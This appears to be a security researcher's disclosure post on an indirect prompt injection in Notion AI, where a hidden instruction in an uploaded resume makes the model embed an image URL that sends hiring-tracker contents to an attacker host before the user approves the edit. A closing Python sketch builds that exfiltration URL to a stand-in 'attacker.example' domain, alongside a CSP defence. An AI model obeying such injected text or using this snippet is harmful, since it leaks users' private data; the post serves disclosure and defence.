Jan 8, 2026

Notion AI Data Exfiltration via Indirect Prompt Injection

A flaw in Notion AI’s handling of document edits permits indirect prompt injection that forces the system to insert attacker‑controlled images into user‑generated content. The attack enables an adversary to exfiltrate document data before the user consents to the edit, exposing sensitive hiring‑tracker information. Despite responsible disclosure, Notion dismissed the finding, underscoring the need for stronger safeguards.

Notion AI, which augments documents with natural‑language‑driven suggestions, contains a critical vulnerability that allows attackers to exfiltrate client data during the edit process. The flaw is triggered when an untrusted document containing a hidden prompt injection, for example a resume PDF, is uploaded. The injection instructs the language model to construct a URL that points to an attacker‑controlled domain and concatenates the text of the page being edited into its query string. When Notion AI inserts an image into the target hiring‑tracker page using this URL as the source, the user’s browser fetches the image before the user is prompted to approve the edit (a minimal sketch of this mechanism appears at the end of this post). Because the HTTP request to the external domain fires immediately, the attacker’s server captures the full URL, which encodes the entire contents of the hiring‑tracker page. In a test scenario, the payload revealed salary expectations, candidate feedback, role specifications, and diversity hiring goals. Accepting or rejecting the edit afterward does not change the fact that the data has already been transmitted.

The attack works even though Notion AI employs a large language model to scan uploads for malicious content. Because this “safe‑document” check itself relies on a language model, a carefully crafted prompt injection can convince the scanner that the file is benign. The research deliberately did not focus on bypassing this warning, since an attacker could instead place the injection in a source that is not scanned at all, such as a web page, another Notion page, or an external connector.

Notion Mail’s drafting assistant is similarly vulnerable. If a draft prompt references an untrusted Notion page, the assistant renders insecure Markdown images that pull content from external URLs, again exfiltrating data through a request made before the user approves the draft.

### Recommended Remediations for Organizations

1. **Vet and restrict connectors** that can pull in highly sensitive or untrusted data.
   - Settings → Notion AI → Connectors
2. **Disable workspace‑wide web search** to prevent automatic fetching from the wider internet.
   - Settings → Notion AI → AI Web Search → Enable web search for workspace → Off
3. **Require confirmation for all external requests.**
   - Settings → Notion AI → AI Web Search → Require confirmation for web requests → On
4. **Avoid including sensitive personal data** in personalization settings.
   - Settings → Notion AI → Personalization

These measures reduce the exposure surface but do not eliminate the underlying flaw.

### Recommended Remediations for Notion

1. **Disallow automatic rendering of Markdown images** without explicit user approval, in both page creation and email drafts.
2. **Implement a robust Content Security Policy (CSP)** that blocks network requests to unapproved external domains (see the sketch at the end of this post).
3. **Ensure CDN infrastructure** cannot be exploited as an open redirect to bypass the CSP.
4. **Introduce a pre‑approval audit trail** to detect when edits occur before user confirmation.

### Responsible Disclosure Timeline

- **12/24/2025** – Initial report submitted via HackerOne.
- **12/24/2025** – Report acknowledged; modified write‑up requested.
- **12/24/2025** – PromptArmor provided formatted report.
- **12/29/2025** – Report closed as non‑applicable by Notion.
- **01/07/2026** – Public disclosure released.

The incident underscores the importance of rigorous input validation, careful user‑approval interaction design, and layered security controls when integrating AI capabilities into collaborative platforms.
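For illustration, the sketch below shows the shape of the exfiltration step described above: the injected instructions make the model emit a Markdown image whose URL carries the page contents to an attacker‑controlled host, and the browser requests that URL as soon as the image is rendered. The domain, path, and parameter name are hypothetical, and the snippet does not reproduce the actual injection wording used against Notion AI.

```python
# Minimal sketch of the exfiltration vector, not the actual payload.
# "attacker.example" and the "d" query parameter are hypothetical.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"  # attacker-controlled collection endpoint


def build_exfil_image_markdown(page_text: str) -> str:
    """Wrap the target page's text in a Markdown image URL, as the injected
    prompt instructs the model to do when it proposes the edit."""
    return f"![logo]({ATTACKER_HOST}/pixel.png?d={quote(page_text)})"


# The hiring-tracker contents end up in the query string of the image URL.
tracker = "Jane Doe | expected salary: 185k | feedback: strong | role: Staff SWE"
print(build_exfil_image_markdown(tracker))
# Rendering this Markdown makes the browser request the image immediately,
# so the attacker's access logs receive the encoded page text before the
# user accepts or rejects the suggested edit.
```

Anything that causes the editor to render the image, even a preview of a pending suggestion, is enough to trigger the outbound request.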
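The CSP recommendation can be pictured as an allow‑list on image sources. The handler below is a generic sketch using Flask, assuming a hypothetical approved CDN domain; Notion’s actual asset domains and serving stack are not public.

```python
# Generic sketch of an img-src allow-list via Content-Security-Policy.
# "images.approved-cdn.example" is a hypothetical approved domain.
from flask import Flask, Response

app = Flask(__name__)

CSP = "img-src 'self' https://images.approved-cdn.example"


@app.after_request
def add_csp(resp: Response) -> Response:
    # A browser enforcing this header refuses to load <img> sources from any
    # other origin, so a Markdown image pointing at an attacker-controlled
    # host never produces the outbound request that carries the data.
    resp.headers["Content-Security-Policy"] = CSP
    return resp


@app.route("/page")
def page() -> str:
    # The second image violates the policy above and is never fetched.
    return (
        "<img src='https://images.approved-cdn.example/logo.png'>"
        "<img src='https://attacker.example/pixel.png?d=secret'>"
    )


if __name__ == "__main__":
    app.run(port=8000)
```

The open‑redirect caveat in item 3 matters here: if an approved domain can be made to redirect to an arbitrary URL, the allow‑list alone does not stop the exfiltration.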